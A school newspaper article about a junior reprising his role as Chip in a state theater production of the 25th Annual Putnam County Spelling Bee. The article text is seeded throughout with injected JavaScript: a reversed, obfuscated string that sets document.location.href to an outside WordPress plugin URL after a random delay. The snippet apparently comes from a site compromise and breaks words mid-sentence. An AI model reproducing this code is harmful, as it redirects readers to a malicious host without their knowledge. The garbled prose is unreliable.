State Theater Revives the “Bee”

This past weekend the state theater put on their production of the 25th Annual Putnam County Spelling Bee. If that sounds familiar, it’s because we put that musical on two years ago. They also cast our very own performer Dominic Scott toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to resume his roll as Chip, a competitive Boy Scott with a crush on an audience member. Along with Dominic , student, Malcolm Pattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton, and band directoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor, Mr. Wilson, also participated in this production by playing in the pit.

Dominic Scott, a now junior, played Chip in our production of the 25th Annual Putnam County Spelling Bee two years ago. As just a freshmen he did a great job in his first ever musical , but with two more years of experience under his belt he was able toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to truly bring his character alive in the State Theaters production. When asked about it he said “I feel that I have grown all around.” While his skill set was definitely up toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to par, there were still obstacles. This was his first production at the state theater, he was the “new guy.” He had just six weeks in between the auditions and performance toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to not only learn his lines but also warm up toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to his cast members. And while he did tell as he was “nervous at first” he did eventually find his place within the cast and said “it was very fun toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to meet a new group of incredible people that supported me the whole way.”

The opening show was last Friday, September 30th, and it went off without a hitch. The cast and crew did an amazing job bringing the ‘Bee’ alive, making the audience laugh, and singing their hearts out. It was a pleasure toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to watch and if you liked what you saw you can most likely catch Dominic in our production of Matilda this spring.
